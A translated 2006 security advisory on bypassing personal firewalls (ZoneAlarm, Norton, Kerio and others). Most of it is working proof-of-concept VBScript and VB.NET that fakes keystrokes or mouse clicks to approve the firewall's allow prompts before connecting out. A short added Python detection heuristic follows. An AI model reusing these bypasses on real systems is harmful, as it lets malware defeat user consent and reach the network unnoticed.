Multiple Firewall Products Settings Bypass Vulnerability

王朝other · Author unknown  2006-01-09

Affected systems:

Zone Labs ZoneAlarm Pro 4.5.538.001

Zone Labs ZoneAlarm Pro 4.5

Symantec Norton Personal Firewall 2004

Symantec Norton Personal Firewall 2003

Symantec Norton Personal Firewall 2002

Kerio Personal Firewall 4.1.2

Kerio Personal Firewall 4.1.1

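Kerio Personal Firewall 4.1.0

Description:

Most personal firewalls allow communication to be controlled through keyboard shortcuts or the user interface.

The access control implementation in most personal firewalls is flawed. A remote attacker can exploit this vulnerability to bypass the firewall's controls and gain full access to the system by controlling the mouse or sending keyboard shortcuts.

An attacker can set up a VBScript script that launches a second instance of itself as a form of multithreading; when the first instance connects to the Internet, the second sends keyboard shortcuts to the firewall, which controls the firewall's behaviour and bypasses its controls.

The bypass can also be carried out through mouse control. The program does not use real multithreading, because some firewalls interrupt program execution outright; instead, it runs another instance of itself with an argument, and so bypasses the firewall's controls.

Exploiting this issue, Trojans and other malicious programs can listen as a server or get through the firewall directly, without any prompt from the firewall.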

<*Source: Ferruh Mavituna (ferruh@mavituna.com)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2

*>
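
The self-relaunch behaviour described above (a program starts a second copy of itself with an extra argument, then connects out) leaves a recognisable process-tree trace. The following Python is an added example, not part of the advisory or of Mavituna's code; it flags that pattern in constructed process-creation and network events. The event field names and the names FirewallTest.exe, backup.vbs, report.vbs and mail.vbs are assumptions.

```python
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
WSH = r"C:\Windows\System32\wscript.exe"
EXE = r"C:\Temp\FirewallTest.exe"  # hypothetical binary name

# Constructed, time-ordered sample telemetry; field names are assumptions.
# 192.0.2.0/24 is a documentation address range.
EVENTS = [
    {"type": "proc", "pid": 100, "ppid": 4, "image": WSH, "cmd": r'wscript.exe "C:\Temp\skipZA.vbs"'},
    {"type": "proc", "pid": 101, "ppid": 100, "image": WSH, "cmd": r'wscript.exe "C:\Temp\skipZA.vbs" /send'},
    {"type": "net", "pid": 100, "dest": "192.0.2.10:80"},
    {"type": "proc", "pid": 200, "ppid": 4, "image": WSH, "cmd": r'wscript.exe "C:\Scripts\backup.vbs"'},
    {"type": "net", "pid": 200, "dest": "192.0.2.20:443"},
    {"type": "proc", "pid": 300, "ppid": 4, "image": EXE, "cmd": EXE},
    {"type": "proc", "pid": 301, "ppid": 300, "image": EXE, "cmd": EXE + " skipme"},
    {"type": "net", "pid": 300, "dest": "192.0.2.10:80"},
    {"type": "proc", "pid": 400, "ppid": 4, "image": WSH, "cmd": r'wscript.exe "C:\Scripts\report.vbs"'},
    {"type": "proc", "pid": 401, "ppid": 400, "image": WSH, "cmd": r'wscript.exe "C:\Scripts\mail.vbs" /q'},
    {"type": "net", "pid": 400, "dest": "192.0.2.30:25"},
]

def tokens(cmd):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]

def identity(ev):
    """Return (what is running, token count): the script for script hosts, else the image."""
    toks = tokens(ev["cmd"])
    if ntpath.basename(ev["image"]).lower() in SCRIPT_HOSTS:
        for tok in toks[1:]:
            if tok.lower().endswith(SCRIPT_EXTS):
                return ntpath.basename(tok).lower(), len(toks)
    return ntpath.basename(ev["image"]).lower(), len(toks)

def find_self_relaunch(events):
    """Flag a process that spawned a copy of itself with extra arguments and then connected out."""
    procs, helpers, findings = {}, {}, []
    for ev in events:
        if ev["type"] == "proc":
            me = procs[ev["pid"]] = identity(ev)
            parent = procs.get(ev["ppid"])
            # Same program as the parent, but started with additional arguments.
            if parent and parent[0] == me[0] and me[1] > parent[1]:
                helpers[ev["ppid"]] = ev["pid"]
        elif ev["type"] == "net" and ev["pid"] in helpers:
            findings.append({"program": procs[ev["pid"]][0], "parent_pid": ev["pid"],
                             "helper_pid": helpers.pop(ev["pid"]), "dest": ev["dest"]})
    return findings
```

Multi-process applications that legitimately relaunch themselves also match this heuristic, so a production rule needs an allow-list.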

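Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Ferruh Mavituna (ferruh@mavituna.com) provided the following test method: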

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)

'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)

'5/5/2004

'02.01.2005

'Ferruh Mavituna

'Const DELAY = 1000

'Const TIMES = 1

'Const EXTRADELAY = 0

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName

Const DELAY = 1000

Const TIMES = 1

Const EXTRADELAY = 0

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

'First Sleep for a while

If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

'Force

While i<TIMES

i=i+1

WScript.Sleep DELAY

'1) First add it trusted

shell.sendKeys "+{TAB}" 'Go back once

shell.sendKeys "{UP 2}" 'Go Up

'1) Press Enter

shell.sendKeys "{ENTER}" 'Enter

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["anti-hacker.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Bypassing multiple firewall products

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

'HISTORY

'3/5/2004

'Added ZA

'5/5/2004

'Added Kerio, Outpost

'6/5/2004

'Added Kaspersky Anti-Hacker

'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall

Const EXTRADELAY = 0

Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------

'Define Delays and Times for Firewalls

'----------------------------------------------

'// Firewalls

'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)

Const ZoneAlarm = 0

'Kerio 4.0.14

Const Kerio = 1

'Agnitium Outpost Firewall 2.1.303.4009 (314)

Const Outpost = 2

'Kaspersky Anti-Hacker 1.5.119.0

Const Kaspersky = 3

'Select Active Firewall

intFirewall = Kaspersky

'// Configuration

'Kaspersky Anti-Hacker

arrDelays(Kaspersky,0) = 1000

arrDelays(Kaspersky,1) = 1

'Define Keys for Firewalls

arrKeys(Kaspersky,0) = "{ENTER}"

If DETERMINEFIREWALL Then

'TODO:Read Registries and determine it !

End If

Dim argLen, shell, sendKeyMod, i, j, appName

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

'First Sleep for a while

If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

'Force

While i<arrDelays(intFirewall,1)

i=i+1

WScript.Sleep arrDelays(intFirewall,0)

'Send Keys

For j=0 To Ubound(arrKeys,2)

If arrKeys(intFirewall,j)<>"" Then

shell.sendKeys arrKeys(intFirewall,j)

End If

Next

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["ZoneAlarm.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i

Const DELAY = 10

Const TIMES = 15

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

While i<TIMES

i=i+1

WScript.Sleep DELAY

shell.sendKeys "%R" 'Remember, Do not ask again !

shell.sendKeys "%Y" 'Click Yes

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run("skipZA.vbs /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["testFirewall.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Simple Firewall Test File

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

Option Explicit

Dim shell, sendKeyMod, Result

Const URL = "http://ferruh.mavituna.com"

'Connect

Wscript.Echo "Now I'll try to connect to " & URL

If connect(URL,Result) Then

Wscript.Echo "Mission Accomplished..., Here is the headers;" & vbNewline & Result

Else

Wscript.Echo "OK, I couldn't access to Internet"

End If

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL, ByRef Result)

connect = True

On Error Resume Next

ERR.Clear

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

Result = web.getAllResponseHeaders

Set web = Nothing

If ERR<>0 Then connect = False

End Function

["norton.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i

Const DELAY = 10

Const TIMES = 15

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

While i<TIMES

i=i+1

WScript.Sleep DELAY

shell.sendKeys "%A" 'Remember, Do not ask again !

shell.sendKeys "%O" 'Click Yes

Wend

'Customized for norton fw by Oezguer Mavituna

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run("skipZA.vbs /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["mousecontrol.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 5/19/2004

'// Simple POC for Bypassing multiple firewall products

'// Code : VB.NET

'***********************************************************

Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal dwExtraInfo As Long)

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Const MOUSEEVENTF_LEFTDOWN = &H2

Private Const MOUSEEVENTF_LEFTUP = &H4

Private Const MOUSEEVENTF_MIDDLEDOWN = &H20

Private Const MOUSEEVENTF_MIDDLEUP = &H40

Private Const MOUSEEVENTF_RIGHTDOWN = &H8

Private Const MOUSEEVENTF_RIGHTUP = &H10

Private Const sleepTime = 0.5 'As Second

Private Const slowMotion = True 'Debug !

'Firewalls

Const ZoneAlarm As Integer = 0

'Set Points

Dim arrFirewalls(1, 3) As Integer

Dim activeFirewall As Integer = ZoneAlarm

Private Sub setupFirewalls()

'Get Current Screen

'This is just POC, Real World Example should automatically detect installed firewall, change sleep times, care about exact position, taskbar position etc. But It's easy to write a real world example

Dim screenY As Integer = Screen.PrimaryScreen.Bounds.Height

Dim screenX As Integer = Screen.PrimaryScreen.Bounds.Width

arrFirewalls(ZoneAlarm, 0) = screenX - 250 'X Remember !

arrFirewalls(ZoneAlarm, 1) = screenY - 130 'Y

arrFirewalls(ZoneAlarm, 2) = screenX - 190 ' Yes

arrFirewalls(ZoneAlarm, 3) = screenY - 93

End Sub

Private Sub frmFirewallTest_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

'Hide App

Me.ShowInTaskbar = False

Me.Visible = False

'Args

Dim flagArg As String = Application.ExecutablePath

If Environment.GetCommandLineArgs().Length > 1 Then

'Sleep;

Sleep(sleepTime * 1000)

'Try;

setupFirewalls()

If slowMotion Then Sleep(1000)

'First Access

bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

If slowMotion Then Sleep(1000)

bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

'Gain Access for HTTP

Sleep(300)

If slowMotion Then Sleep(1000)

bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

If slowMotion Then Sleep(1000)

bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

'Quit !

Me.Dispose()

Else

System.Diagnostics.Process.Start(flagArg, "skipme")

'Access Internet

If downloadURL() Then

MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", MessageBoxButtons.OK, MessageBoxIcon.Warning)

End If

Me.Dispose()

End If

End Sub

'Bypas POC

Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)

'Save Old Positions for return !

Dim oldX As Integer = Cursor.Position.X

Dim oldY As Integer = Cursor.Position.Y

'Set New Position

Cursor.Position = New Point(X, Y)

'Click

mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)

mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)

'Return

Cursor.Position = New Point(oldX, oldY)

End Sub

'Connect Internet

Private Function downloadURL() As Boolean

downloadURL = True

Try

Dim wc As New System.Net.WebClient()

wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")

Catch

MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, MessageBoxIcon.Error)

downloadURL = False

End Try

End Function

["bypassSendKey.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Bypassing multiple firewall products

'***********************************************************

'HISTORY

'3/5/2004

'Added ZA

'5/5/2004

'Added Kerio, Outpost

'6/5/2004

'Added Kaspersky Anti-Hacker

'5/9/2004

'LooknStop

'5/20/2004

'Norton

'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall

Const EXTRADELAY = 0

Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------

'Define Delays and Times for Firewalls

'----------------------------------------------

'// Firewalls

'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com

Const ZoneAlarm = 0

'Kerio 4.0.14

Const Kerio = 1

'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com

Const Outpost = 2

'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com

Const Kaspersky = 3

'Look 'n' Stop 2.04p2 | www.looknstop.com

Const LooknStop = 4

'Norton | www.norton.com

Const Norton = 5

'Select Active Firewall

intFirewall = ZoneAlarm

'// Configuration

'Define Keys, Delays, Repeat Times for Firewalls

'Kaspersky Anti-Hacker

arrDelays(Kaspersky,0) = 400

arrDelays(Kaspersky,1) = 2

arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK

'ZoneAlarm

arrDelays(ZoneAlarm,0) = 10

arrDelays(ZoneAlarm,1) = 15

arrKeys(ZoneAlarm,0) = "%R" 'Select Remember

arrKeys(ZoneAlarm,1) = "%Y" 'Yes

'Outpost

arrDelays(Outpost,0) = 1000

arrDelays(Outpost,1) = 1

arrKeys(Outpost,0) = "+{TAB}" 'Go back once

arrKeys(Outpost,1) = "{UP 2}" 'Go Up

arrKeys(Outpost,1) = "{ENTER}" 'Enter

'Kerio

arrDelays(Kerio,0) = 100

arrDelays(Kerio,1) = 10

arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !

arrKeys(Kerio,1) = "%P" ' Yes

'LookNStop

arrDelays(LooknStop,0) = 1000

arrDelays(LooknStop,1) = 1

arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize

arrKeys(LooknStop,1) = "{LEFT}" ' Left

arrKeys(LooknStop, 2) = " " ' Space

'Norton

arrDelays(Norton,0) = 100

arrDelays(Norton,1) = 5

arrKeys(Norton,0) = "%A" ' Allow

arrKeys(Norton,1) = "%O" ' OK

If DETERMINEFIREWALL Then

'TODO:Read Registries and determine it !

End If

Dim argLen, shell, sendKeyMod, i, j, appName

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

'First Sleep for a while

If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

'Force

While i<arrDelays(intFirewall,1)

i=i+1

WScript.Sleep arrDelays(intFirewall,0)

'Send Keys

For j=0 To Ubound(arrKeys,2)

If arrKeys(intFirewall,j)<>"" Then

shell.sendKeys arrKeys(intFirewall,j)

End If

Next

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["Kerio.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

'Modified for Kerio 4.0.14

'5/5/2004

'Ferruh Mavituna

'Const DELAY = 100

'Const TIMES = 10

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName

Const DELAY = 100

Const TIMES = 10

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

While i<TIMES

i=i+1

WScript.Sleep DELAY

shell.sendKeys " " 'Remember, Do not ask again !

shell.sendKeys "%P" 'Click Yes

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

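Recommendations:

Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:

* Require a password for every action that is allowed.

Vendor patch:

Zone Labs

---------

The ZoneLabs Team has released a new version that fixes this vulnerability: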

http://www.zonelabs.com/

 
 
 